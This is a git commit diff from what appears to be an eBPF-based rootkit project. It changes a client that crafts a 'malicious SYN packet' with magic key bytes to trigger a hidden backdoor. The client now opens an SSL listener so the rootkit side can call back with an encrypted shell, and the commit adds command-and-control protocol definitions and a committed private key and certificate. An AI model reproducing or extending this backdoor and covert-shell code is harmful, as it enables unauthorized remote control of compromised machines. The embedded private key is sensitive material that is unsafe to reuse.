Completed message sharing, starting with protocol now

2025-12-21 17:23:07 +08:00 · 2022-05-05 22:14:28 -04:00
parent 213e30ba3b
commit cceca23478
11 changed files with 116 additions and 107 deletions
--- a/src/.output/kit.o
+++ b/src/.output/kit.o
--- a/src/bin/kit
+++ b/src/bin/kit
--- a/src/client/client.c
+++ b/src/client/client.c
@@ -12,7 +12,6 @@

 #include "../common/constants.h"
 #include "../common/c&c.h"
-#include "../common/protocol.h"
 #include "include/sslserver.h"

 // For printing with colors
@@ -195,7 +194,7 @@ void activate_command_control_shell_encrypted(char* argv){
    check_ip_address_format(argv);
    printf("["KBLU"INFO"RESET"]""Crafting malicious SYN packet...\n");
    //+1 since payload must finish with null character for parameter passing, although not sent in the actual packet payload
-    char payload[CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE+1];
+    char payload[CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE+1] = {0};
    srand(time(NULL));
    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE; ii++){
        payload[ii] = (char)rand();
@@ -203,10 +202,10 @@ void activate_command_control_shell_encrypted(char* argv){
    //Follow protocol rules
    char section[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
    char section2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
-    char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_1;
-    char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_2;
+    char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN+1] = CC_TRIGGER_SYN_PACKET_KEY_1;
+    char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN+1] = CC_TRIGGER_SYN_PACKET_KEY_2;
    //K3 with command to start the encrypted connection with the backdoor
-    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL;
+    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN+1] = CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL;
    char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
    strncpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
@@ -238,35 +237,10 @@ void activate_command_control_shell_encrypted(char* argv){
    }else{
        printf("["KGRN"OK"RESET"]""Secret message successfully sent!\n");
    }
-    printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n");
    
-    //Wait for rootkit ACK to ensure it's up
-    rawsocket_sniff_pattern(CC_PROT_ACK);
-    printf("["KGRN"OK"RESET"]""Success, received ACK from backdoor\n");   
+    server_run(8500);

-    //Received ACK, we proceed to send command
-    while(1){
-        char buf[BUFSIZ];                                                                                                                                                          
-        printf(""KYLW"c>:"RESET"");                                                                                                                                                              
-        fgets(buf, BUFSIZ, stdin);
-        if ((strlen(buf)>0) && (buf[strlen(buf)-1] == '\n')){
-            buf[strlen(buf)-1] = '\0';   
-        }                                                                                                                                                                         
    
-        char msg[BUFSIZ];
-        strcpy(msg, CC_PROT_MSG);
-        strcat(msg, buf);
-        packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, msg);
-        printf("Sending %s\n", msg);
-        if(rawsocket_send(packet)<0){
-            printf("["KRED"ERROR"RESET"]""An error occured. Aborting...\n");
-            return;
-        }
-        printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n");
-        packet = rawsocket_sniff_pattern(CC_PROT_MSG);
-        char* res = packet.payload;
-        printf("["KGRN"RESPONSE"RESET"] %s\n", res);   
-    }
    
 }

--- a/src/client/client.o
+++ b/src/client/client.o
--- a/src/client/include/sslserver.h
+++ b/src/client/include/sslserver.h
@@ -1,7 +1,5 @@
 // This code is based from the following tutorial:
 // https://aticleworld.com/ssl-server-client-using-openssl-in-c/
-// gcc -Wall -o server server.c -L/usr/lib -lssl -lcrypto
-// sudo ./server <portnum>

 #include "openssl/err.h"
 #include "openssl/ssl.h"
@@ -19,19 +17,6 @@

 #define USE_FUNCTIONS 0

-void instructionsForPem(void) {
-  printf("\n");
-  printf("\n");
-  printf("Did you forget to create your mycert.pem file?\n");
-  printf("\n");
-  printf("Run: openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout "
-         "mycert.pem -out mycert.pem\n");
-  printf("\n");
-  printf("If you haven't, but that's my best guess of what has gone wrong..\n");
-  printf("\n");
-  printf("\n");
-}
-
 #if (USE_FUNCTIONS)
 SSL_CTX *InitServerCTX(void) {
  const SSL_METHOD *method;
@@ -155,28 +140,20 @@ void Servlet(SSL *ssl) {
 }
 #endif

-int server_run(int argc, char **argv) {
+int server_run(int port) {
  SSL_CTX *ctx;
  int server;
-  int portnum;
  const char *szPemPublic = "mycert.pem";
  const char *szPemPrivate = "mycert.pem";
 #if (!(USE_FUNCTIONS))
  const SSL_METHOD *method;
 #endif

-  if (argc != 2) {
-    printf("Usage: %s <portnum>\n", argv[0]);
-    exit(0);
-  }
-
-  portnum = atoi(argv[1]);
-
-  if (portnum < 1024) {
+  if (port < 1024) {
    if (getuid() != 0) {
      printf("This program must be run as root/sudo user since your port # "
             "(%d) is < 1024\n",
-             portnum);
+             port);
      exit(1);
    }
  }
@@ -203,14 +180,12 @@ int server_run(int argc, char **argv) {
  /* set the local certificate from CertFile */
  if (SSL_CTX_use_certificate_file(ctx, szPemPublic, SSL_FILETYPE_PEM) <= 0) {
    ERR_print_errors_fp(stderr);
-    instructionsForPem();
    abort();
  }

  /* set the private key from KeyFile (may be the same as CertFile) */
  if (SSL_CTX_use_PrivateKey_file(ctx, szPemPrivate, SSL_FILETYPE_PEM) <= 0) {
    ERR_print_errors_fp(stderr);
-    instructionsForPem();
    abort();
  }

@@ -229,7 +204,7 @@ int server_run(int argc, char **argv) {
  server = socket(PF_INET, SOCK_STREAM, 0);
  bzero(&addr, sizeof(addr));
  addr.sin_family = AF_INET;
-  addr.sin_port = htons(portnum);
+  addr.sin_port = htons(port);
  addr.sin_addr.s_addr = INADDR_ANY;
  if (bind(server, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
    perror("can't bind port");
@@ -252,7 +227,7 @@ int server_run(int argc, char **argv) {

    // this is my attempt to run HTTPS.. This is sort of the minimal header that
    // seems to work.  \r is absolutely necessary.
-    const char *szHttpServerResponse =
+    const char *response =
        "HTTP/1.1 200 OK\r\n"
        "Content-type: text/html\r\n"
        "\r\n"
@@ -266,7 +241,7 @@ int server_run(int argc, char **argv) {
        "</html>\n";
 #endif
    int client;
-
+    printf("Listening for connections\n");
    client = accept(server, (struct sockaddr *)&addr,
                    &len); /* accept connection as usual */
    printf("Connection: %s:%d\n", inet_ntoa(addr.sin_addr),
@@ -305,8 +280,8 @@ int server_run(int argc, char **argv) {
      printf("Client msg:\n[%s]\n", buf);

      if (bytes > 0) {
-        printf("Reply with:\n[%s]\n", szHttpServerResponse);
-        SSL_write(ssl, szHttpServerResponse, strlen(szHttpServerResponse));
+        printf("Reply with:\n[%s]\n", response);
+        SSL_write(ssl, response, strlen(response));
      } else {
        ERR_print_errors_fp(stderr);
      }
--- a/src/client/injector
+++ b/src/client/injector
--- a/src/client/mycert.pem
+++ b/src/client/mycert.pem
@@ -0,0 +1,81 @@
+-----BEGIN PRIVATE KEY-----
+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
+A/iGISWr4/qHcINgtY1nBHeCd0EkOQ==
+-----END PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIIE+zCCAuOgAwIBAgIURgo+OnvjsvSRONRpscRzizvP+QUwDQYJKoZIhvcNAQEL
+BQAwDTELMAkGA1UEBhMCRVMwHhcNMjIwNTA2MDEwMzM4WhcNMjMwNTA2MDEwMzM4
+WjANMQswCQYDVQQGEwJFUzCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIB
+AKpElD4Wn11yE15GMDf97qhy5MYN2X0oAiXSE/epBhc6KSsnJjQhD0WvgdP9n6GM
+zX9EUXN1r6sg4iHoWL1dBaYhKA2Qsgjx7r8XYHyyCrl4m4ps/5dr8kZsaLB4M5r9
+LhQSb8mZubjQO2CvTwYIBisKLfmPg4AcDsBOj0C+lKBrnCRGwpy6YuWcll0UvOtd
+Zy5psvK/pNUatViYkg/KRn5dObQSgUPlPlDj2jVCaH8HUgh4T+E/hHsvOgrgpzm4
+SVLqFS0sgewegrUvjNUCo/7JvcQrQeXD4mCZ0wt26U4fFf6GnF2q1NES5fBa9LEK
+po3UwgpAsOJFfdCi+fXpqcoNLxecL0PBrojN1yBdm2VM0YTTKBtQe/iwtcXQkkkd
+SxWtCEE86Mwi7zQhZJgq67B/gGdvuZ8nKP5/oVqc4al9JCPTqHhpZqI/w9QrfyK9
+QZ8XSA8NsrTVD/GqpxpWqF6jkoT9hRWSzfFJpMsx4r2+KzeLn89j4YsvrjgrVz76
+zyxIIWA6P2ANMvLgFa71XYeQK1PZkkYbriC9wtjP7ljmDwVbLEwWyBCtCw/I/ATP
+S9/d12lS8C6vXOvfn99jCN0vuXQywHJIkOtUh0q1fTDHyDbig4UzS/kpm6QKmzqb
+vtzaZr0kHTfVGhrCegXjQlOcZ07XjFRMD215OBccNKKJAgMBAAGjUzBRMB0GA1Ud
+DgQWBBQfgD7ZU0HjCQlRmuThMlRYnAkb/TAfBgNVHSMEGDAWgBQfgD7ZU0HjCQlR
+muThMlRYnAkb/TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4ICAQBC
+VzY9Q7YXIGQRv1hw2uzpv15mQJHGIPh1YyRJMQIaAPAfvLy5Mi+IY+ZMvCfVlykD
+NTxoPLiJQvwf61UOPyxOHA/TUXdLybeqiFCM025PHx/H8K482WBORPOuOFep2xf1
+A4MEFyX3aeBAEFcR0/ns2evQt4KIjmglHxmCPCTA29/6P+ObS0BtUngyFKyoCS9Z
+10EakCZsC65ALV7/qU4jPrvQYU0xMSnAop+pwAFtUvKzlfrPNuCNw3jSR3yX2pZj
+/Pkhjub7dlIAR+A2iwktAnv8s4U/QbOia/hfu3hDgXK5yvynfjBAHcFZ6nmZFlUH
+9DyTaYObWG5s3Hz3gD4hbO4m4e4mnFqwK+Q5oNBnR0Sjw/6snowKf5rq78SJ2w0w
+buoXThpknQFpvHfFnWmxcynqUp4LFWmXcK4OEkl85iwmhu/8R7rRt3K3NgrH9U18
+lya7XySsKL7tCH94B1sG81SK8l503Vs+7o37pGiehd00mj5YBuR5VqFh1QgrZQmp
+wHrqLodvegwuRxpUuwrI+3IvLYB5f3n5i9uL2/n5b6Y97aTyrXijoTdmZEn68OE1
+exrEy4SJhZXu2DFkFIjFYISw73hwsXBrr54RX34Y4y5NYb7G0IXLMdiLaKzCChAC
+gESIACorO+q0WCekd1dT+OyxdyzScFXMkgeu0P0Fmw==
+-----END CERTIFICATE-----
--- a/src/common/c&c.h
+++ b/src/common/c&c.h
@@ -1,22 +1,31 @@
 #ifndef __BPF_CC_H
 #define __BPF_CC_H

-#include "protocol.h"
-
+//C&C V0
 #define CC_PROT_SYN "CC_SYN"
 #define CC_PROT_ACK "CC_ACK"
 #define CC_PROT_MSG "CC_MSG#"
 #define CC_PROT_FIN_PART "CC_FIN"
 #define CC_PROT_FIN CC_PROT_MSG CC_PROT_FIN_PART

-//C&C V1 -- bpv47-like trigger
+//C&C V1 -- bpv47-like trigger + encrypted shell
 #define CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE 0x10
 #define CC_TRIGGER_SYN_PACKET_KEY_1 "\x56\xA4"
 #define CC_TRIGGER_SYN_PACKET_KEY_2 "\x78\x13"
 #define CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL "\x1F\x29"
-
 #define CC_TRIGGER_SYN_PACKET_SECTION_LEN 0x02

+#define CC_PROT_COMMAND_ENCRYPTED_SHELL 0
+
+//C&C V2 -- Distributed hidden payload in packet stream
+struct trigger_t {
+    unsigned char xor_key;
+    unsigned int ip;
+    short unsigned int port;
+    unsigned char pad1;
+    short unsigned int pad2;
+    short unsigned int crc;
+};


 #endif
--- a/src/common/protocol.h
+++ b/src/common/protocol.h
@@ -1,19 +0,0 @@
-#ifndef __PROTOCOL_H
-#define __PROTOCOL_H
-
-//V1
-#define CC_PROT_COMMAND_ENCRYPTED_SHELL 0
-
-//V2
-struct trigger_t {
-    unsigned char xor_key;
-    unsigned int ip;
-    short unsigned int port;
-    unsigned char pad1;
-    short unsigned int pad2;
-    short unsigned int crc;
-};
-
-
-
-#endif
--- a/src/user/include/utils/network/ssl_client.h
+++ b/src/user/include/utils/network/ssl_client.h
@@ -1,7 +1,5 @@
-// This is based from:
-// --------------------
+// This is based from the following tutorial:
 // https://aticleworld.com/ssl-server-client-using-openssl-in-c/
-// gcc -Wall -o client client.c  -L/usr/lib -lssl -lcrypto
 #include <errno.h>
 #include <malloc.h>
 #include <netdb.h>
@@ -81,31 +79,21 @@ void ShowCerts(SSL *ssl) {
 }
 #endif

-int clientrun(int argc, char **argv) {
+int client_run(char* hostname, uint16_t portnum) {
  SSL_CTX *ctx;
  int server;
  SSL *ssl;
  static char buf[1024 * 1024];
  int bytes;
-  char *hostname;
-  uint16_t portnum;
 #if (!(USE_FUNCTIONS))
  struct hostent *host;
  struct sockaddr_in addr;
  const SSL_METHOD *method;
 #endif

-  if (argc != 3) {
-    printf("usage: %s <hostname> <portnum>\n", argv[0]);
-    exit(0);
-  }
-
  // Initialize the SSL library
  SSL_library_init();

-  hostname = argv[1];
-  portnum = atoi(argv[2]);
-
 #if (USE_FUNCTIONS)
  ctx = InitCTX();
  server = OpenConnection(hostname, portnum);
@@ -148,8 +136,8 @@ int clientrun(int argc, char **argv) {
    X509 *cert;
    char *line;
 #endif
-    char szRequest[4096];
-    sprintf(szRequest,
+    char request[4096];
+    sprintf(request,
            "GET / HTTP/1.1\r\n"
            "User-Agent: Wget/1.17.1 (linux-gnu)\r\n"
            "Accept: */*\r\n"
@@ -159,7 +147,7 @@ int clientrun(int argc, char **argv) {
            "\r\n",
            hostname, portnum);

-    printf("Sending:\n[%s]\n", szRequest);
+    printf("Sending:\n[%s]\n", request);

    printf("\n\nConnected with %s encryption\n", SSL_get_cipher(ssl));

@@ -181,7 +169,7 @@ int clientrun(int argc, char **argv) {
    }
 #endif

-    SSL_write(ssl, szRequest, strlen(szRequest)); /* encrypt & send message */
+    SSL_write(ssl, request, strlen(request)); /* encrypt & send message */

    bytes = SSL_read(ssl, buf, sizeof(buf)); /* get reply & decrypt */
    buf[bytes] = 0;
--- a/src/user/kit.c
+++ b/src/user/kit.c
@@ -109,8 +109,9 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
 		printf("%s COMMAND  pid:%d code:%i\n", ts, e->pid, e->code);
 		switch(e->code){
 			case CC_PROT_COMMAND_ENCRYPTED_SHELL:
+			//TODO EXTRACT IP FROM KERNEL BUFFER
 				printf("Starting encrypted connection\n");
-				
+				client_run("127.0.1.1", 8500);
            	break;
 			default:
 				printf("Command received unknown: %d\n", e->code);